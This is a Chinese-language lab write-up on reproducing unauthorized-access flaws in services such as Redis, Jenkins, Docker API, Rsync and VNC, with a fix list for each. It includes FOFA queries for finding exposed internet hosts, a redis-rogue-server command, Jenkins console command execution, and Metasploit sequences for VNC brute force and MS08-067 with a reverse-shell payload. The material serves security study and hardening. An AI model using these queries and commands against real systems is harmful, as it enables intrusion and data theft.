redis，MongoDB等未授权访问靶场复现

redis未授权访问

在docker中启动vulhub对应的靶场

目录：cd /vulhub-master/redis/4-unacc

在kali上安装redis程序进行服务连接

安装redis
apt-get install redis
redis链接
redis-cli -h IP -p 端口

输入info可以查看信息

接下来我们使用redis-rogue-server来获取命令执行环境

python3 redis-rogue-server.py --rhost 目标IP --lhost 本机IP

MongoDB未授权访问

在启动MongoDB时没有添加参数，导致可以使用默认空口令进行登录

修复和防御：

1.在启动时为MongoDB添加--auth参数，为MongoDB添加用户

2.启动时加入参数 --bind_ip 127.0.0.1 或在 /etc/mongodb.conf 文件中添加以下内容：
bind_ip = 127.0.0.1

Memcached未授权访问

1.由于 Memcached 的安全设计缺陷，没有权限控制模块，所以对公网开放的 Memcache 服务很容易被攻击者扫描发现，攻击者无需认证，通过命令交互可直接读取 Memcached 中的敏感信息。

2.复现

漏洞修复：
1. 设置Memcached只允许本地访问。
2. 禁止外网访问Memcached 11211端口。
3. 配置访问控制策略。
4. 最小化权限运行。
5. 修改默认端口等。

Zookeeper未授权访问

Zookeeper 安装部署之后默认情况下不需要任何身份验证，攻击者可以远程利用 Zookeeper，通过服务器收集敏感信息或者在 Zookeeper 内进行破坏。攻击者能够执行所有只允许由管理员运行的命令。

port="2181" && "Zookeeper" && country="US"

kali中使用命令进行漏洞测试

echo envi | nc ip 端⼝

使用Zookeeper可视化管理工具进行连接

修复方法

1.限制网络访问：通过防火墙或网络策略，仅允许信任的 IP 地址（如集群内部节点）访问 2181 端口，避免直接暴露在公网。
2.启用身份认证：
在 Zookeeper 配置文件（zoo.cfg）中启用 SASL 认证，通过jaas.conf配置用户名密码验证；
结合 Kerberos 实现更严格的身份校验（适用于分布式集群环境）。
3.权限控制：通过 Zookeeper 的 ACL（Access Control List）机制，为节点设置细粒度权限（如read、write、admin等），限制非授权用户的操作范围。
4.定期审计：启用 Zookeeper 的审计日志，记录所有操作行为，便于及时发现异常访问。

Jenkins未授权访问

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在搜索到的网站中，选择系统管理，脚本命令行

 运行命令

println "whoami" .execute().text

漏洞修复

1.升级版本

2.添加认知，加强密码强度

3. 禁止把Jenkins直接暴露在公网

Jupyter NoteBook未授权访问

如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令，默认端口：8888。

"Jupyter Notebook" && port="8888" && "terminals" //fofa
cd /vulhub/jupyter/notebook-rce
docker-compose up -d  //vulhub靶场

如果存在未授权点击连接会直接跳转到web页面不需要输入密码即可看到jupyter界面

点击图示的位置即可新建一个终端，可以执行命令

修复方法：

1.开启身份验证，防止未经授权的用户进行访问

2.访问控制策略，限制IP访问，只允许固定IP访问

Elasticsearch未授权访问

ElasticSearch是基于Lucene、由Java开发的流行企业级分布式全文搜索引擎，遵循Apache许可开源，提供RESTful web接口，其增删改查操作均通过http接口完成。由于授权模块需付费，免费开源的ElasticSearch可能存在未授权访问漏洞，攻击者通常会请求一个9200或者93000端口的服务器来获得所有权限并对数据任意操作，进而导致业务系统面临敏感数据泄露、数据丢失或破坏，甚至遭受勒索等风险。

"Elasticsearch" && port="9200"

 存在未授权可直接访问到页面，不需要登录

漏洞测试

拼接/_nodes可以查看节点信息

修复方法：
1.限制IP访问或者固定IP

2. 在 config/elasticsearch.yml 中为9200端口设置认证等

Kibana未授权访问

Kibana如果允许外网访问且没有做安全登录认证，就会被外部任意访问，查看所有数据，造成数据泄露。在默认配置下，Kibana就可以访问Elasticsearch中的所有数据。

"kibana" && port="5601"

直接访问Kibana的页面且无需账号密码可以登陆进入登录界面

修复方法：

1.升级到最新版

2.在 Kibana 所在的服务器上安装 Nginx 服务，利用 Nginx 的转发指令实现（访问页面时）需要输入账号密码才可以访问。

3.如果正常业务中 kibana 服务需要被其他服务器来访问，可以通过 iptables 策略，仅允许指定的 IP 来访问服务。

Docker Remote API未授权访问

Docker Remote API配置不当可导致未授权访问，被攻击者恶意利用。攻击者无需认证即可访问到Docker数据，可能导致敏感信息泄露，黑客也可以删除Docker上的数据，直接访问宿主机上的敏感信息，或对敏感文件进行修改，最终完全控制服务器。

fofa语法

port="2375" && "docker"

直接访问并拼接

/version 查看版本
/info 查看信息

使用 -H 参数连接目标主机的 Docker，使用 version命令查询目标版本

漏洞修复：

1. 端口访问控制  
对2375端口做网络访问控制，如设置iptables策略仅允许指定的IP来访问Docker接口。  
2. 使用TLS认证

Kubernetes Api Server未授权访问

Kubernetes正常启动后开两个默认端口（8080、6443），均提供Api Server服务，分别可通过Web访问和kubectl调用。若运维未合理配置验证与权限，攻击者可借此获取容器权限。

port="8080" && app="Kubernetes"

Hadoop未授权访问

Hadoop是Apache开发的分布式系统基础架构，若服务器开放其HDFS的50070等默认端口，黑客可通过命令行操作目录数据（删除、下载、浏览、执行命令等），危害极大。

port="8088" && app="Hadoop"

打开页面可以直接访问不经过用户密码验证

漏洞修复：

1.如没有必要可以关闭web管理页面

2.开启身份验证，防止未经授权用户登录

3.设置“安全组”访问控制策略，将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端口。

ActiveMQ未授权访问

默认情况下，ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄露。

body="ActiveMQ" && port="8161"

访问admin目录，默认使用admin/admin即可登录

漏洞修复：
1.可以修改其账号密码

RabbitMQ未授权访问

port="15672"

直接访问页面输入默认的账号密码即可，默认账号密码为guest

修复方法：

1.修改密码为强密码，删掉默认的guest用户

2.只允许内网访问，不对外网访问 

Springboot Actuator未授权访问

在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点（endpoints）来获取应用系统中的监控信息，从而导致信息泄露甚至服务器被接管的事件发生。

原生断点有：
 

/dump - 显示线程转储（包括堆栈跟踪）  
/autoconfig - 显示自动配置报告  
/configprops - 显示配置属性  
/trace - 显示最后几条HTTP消息（可能包含会话标识符）  
/logfile - 输出日志文件的内容  
/shutdown - 关闭应用程序  
/info - 显示应用信息  
/metrics - 显示当前应用的'指标'信息  
/health - 显示应用程序的健康指标  
/beans - 显示Spring Beans的完整列表  
/mappings - 显示所有MVC控制器映射  
/env - 提供对配置环境的访问  
/restart - 重新启动应用程序

icon_hash="116323821"

2. 当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了 springboot 框架，可以拼接/env，/trace来查看基本的属性，或者http跟踪信息

3.修复方法

1.禁止/env拼接

2.禁止对外开放

3.升级 

FTP未授权访问

如果服务器开启了允许匿名访问，则可以不需要登录直接访问到服务器上的相关内容

ftp://ip:port/

JBoss未授权访问

title="Welcome to JBoss" && icon_hash="-656811182"

拼接 jmx-console/即可不需要登录直接访问

修复方法：

1. jboss.deployment部署shell
2. 进行JMX Console 安全配置。

Ldap未授权访问

port="389"

通过Ldapadmin可视化工具做连接验证

修复方法

1. 修改ldap的acl，不允许匿名访问。
2. 根据业务设置ldap访问白名单或黑名单

Rsync未授权访问

由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服务器文件。Rsync 默认允许匿名访问，如果在配置文件中没有相关的用户认证以及文件授权，就会触发隐患。

(port="873") && (is_honeypot=false && is_fraud=false)


cd vulhub/rsync/common
docker-compose up -d

可使用Nmap扫描该端口是否开启服务

可以访问src目录

rsync rsync://IP:873/src/

下载文件

利用定时任务反弹shell

等待17分钟即可反弹到shell

VNC未授权访问

(port="5900") && (is_honeypot=false && is_fraud=false)

使用MSF中的模块进行检测和漏洞利用

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后，直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

3.vnc连接

vncviewer ipaddress 

Dubbo未授权访问

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

使用Telnet直接连接进行测试

telnet IP port

防御手段

配置dubbo认证

NSF共享目录未授权

"nfs"

 执行命令进行漏洞复现

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e 192.168.126.130
#挂载相应共享⽬录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载⽬录
umount /mnt

漏洞修复

禁止外部访问对应的端口

设置/etc/exports，对访问进行控制 

Druid未授权访问

title="Druid Stat Index"

直接访问

漏洞修复

配置访问账号和密码

禁止外网访问 

CouchDB未授权访问

(port="5984") && (is_honeypot=false && is_fraud=false)

curl连接